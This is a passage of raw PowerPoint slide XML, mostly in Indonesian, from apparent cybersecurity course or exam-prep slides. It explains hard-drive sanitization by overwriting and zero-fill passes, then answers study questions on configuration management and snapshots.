              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Demikian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pula, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> format Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghapus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>referensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menandai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Karena </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membersihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> HDD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penimpaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firmware drive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penimpaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengisian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nol. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengisian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meninggalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Metode yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengisian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengisian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>angka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengisian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pseudorandom. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>agen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> federal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penimpaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penimpaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cukup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lama, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pass yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>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156</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="284535451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1. How does configuration management support cybersecurity operations?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Configuration management </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cybersecurity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsisten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>📌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (misconfigurations) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>celah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>baseline configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencurigakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>compliance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> HIPAA, PCI-DSS).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>incident response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>catatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>historis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>2. What technology are snapshots most commonly associated with?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Virtualization and storage technology</a:t>
            </a:r>
            <a:r>
